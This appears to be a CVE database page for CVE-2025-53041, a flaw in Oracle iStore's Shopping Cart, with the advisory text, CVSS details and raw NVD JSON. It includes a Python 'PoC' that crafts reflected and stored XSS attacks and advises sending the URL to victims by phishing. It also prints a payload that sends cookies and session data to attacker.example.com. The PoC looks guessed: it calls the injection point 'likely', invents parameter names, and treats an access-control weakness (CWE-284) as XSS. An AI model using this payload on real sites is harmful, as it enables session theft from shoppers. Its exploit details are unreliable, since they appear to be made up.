Security Vulnerability Report
CVE-2025-53041 CVSS 6.1 MEDIUM

CVE-2025-53041

Published: 2025-10-21 20:20:41
Last Modified: 2025-10-23 16:07:45

Description

Vulnerability in the Oracle iStore product of Oracle E-Business Suite (component: Shopping Cart). Supported versions that are affected are 12.2.5-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle iStore. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle iStore, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle iStore accessible data as well as unauthorized read access to a subset of Oracle iStore accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:istore:*:*:*:*:*:*:*:* - VULNERABLE
Oracle E-Business Suite (Oracle iStore) 12.2.5
Oracle E-Business Suite (Oracle iStore) 12.2.6
Oracle E-Business Suite (Oracle iStore) 12.2.7
Oracle E-Business Suite (Oracle iStore) 12.2.8
Oracle E-Business Suite (Oracle iStore) 12.2.9
Oracle E-Business Suite (Oracle iStore) 12.2.10
Oracle E-Business Suite (Oracle iStore) 12.2.11
Oracle E-Business Suite (Oracle iStore) 12.2.12
Oracle E-Business Suite (Oracle iStore) 12.2.13
Oracle E-Business Suite (Oracle iStore) 12.2.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-53041 - Oracle iStore Shopping Cart XSS PoC
# Vulnerability: Reflected/Stored XSS in Oracle iStore Shopping Cart component
# Affected versions: 12.2.5 - 12.2.14
# Attack vector: Network (HTTP), No authentication required, User interaction required

import requests
import urllib.parse

TARGET_URL = "https://target-oracle-ebs.example.com/OA_HTML/ibeCAcpSSORView"

# Malicious payload - typical XSS payload for Oracle iStore Shopping Cart
# The injection point is likely in a shopping cart parameter (e.g., item description, search query)
payload = '<script>alert("XSS-CVE-2025-53041");</script>'


def exploit_reflected_xss():
    """
    Exploit reflected XSS in Oracle iStore Shopping Cart component.
    The attacker crafts a malicious URL containing the XSS payload
    and tricks the victim into clicking it.
    """
    # Encode the payload for URL inclusion
    encoded_payload = urllib.parse.quote(payload)

    # Construct malicious URL with XSS payload in shopping cart parameter
    malicious_url = f"{TARGET_URL}?itemDesc={encoded_payload}&action=addToCart"

    print(f"[*] Crafted malicious URL: {malicious_url}")
    print(f"[*] Send this URL to the victim via phishing email or social engineering")
    print(f"[*] When victim clicks, script executes in their browser context")

    return malicious_url


def exploit_stored_xss(session, payload):
    """
    Exploit stored XSS by injecting payload into shopping cart item.
    The payload gets stored and executed when other users view the cart.
    """
    # Step 1: Add malicious item to shopping cart
    add_to_cart_data = {
        "itemNumber": "TEST_ITEM",
        "itemDescription": payload,  # Inject XSS via item description
        "quantity": "1",
        "action": "add"
    }

    response = session.post(
        f"{TARGET_URL}/ibeCAcpAddItem",
        data=add_to_cart_data,
        headers={"Content-Type": "application/x-www-form-urlencoded"}
    )

    print(f"[*] Payload stored in shopping cart")
    print(f"[*] Status: {response.status_code}")

    # Step 2: When victim views the shopping cart, the payload executes
    return response


# Example usage
if __name__ == "__main__":
    # Method 1: Reflected XSS via crafted URL
    url = exploit_reflected_xss()

    # Method 2: Stored XSS via shopping cart manipulation
    # session = requests.Session()
    # exploit_stored_xss(session, payload)

    # Advanced payload for session hijacking
    advanced_payload = '''
    <script>
    var img = new Image();
    img.src = "https://attacker.example.com/steal?cookie=" + document.cookie + "&session=" + document.sessionId + "&url=" + document.location.href;
    </script>
    '''

    print(f"\n[*] Advanced payload for data exfiltration:")
    print(advanced_payload)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53041", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:41.273", "lastModified": "2025-10-23T16:07:45.430", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle iStore product of Oracle E-Business Suite (component: Shopping Cart). Supported versions that are affected are 12.2.5-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle iStore. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle iStore, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle iStore accessible data as well as unauthorized read access to a subset of Oracle iStore accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:istore:*:*:*:*:*:*:*:*", "versionStartIncluding": "12.2.5", "versionEndIncluding": "12.2.14", "matchCriteriaId": "DD8AED6C-F6D0-4721-B75B-E8836012CAB8"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}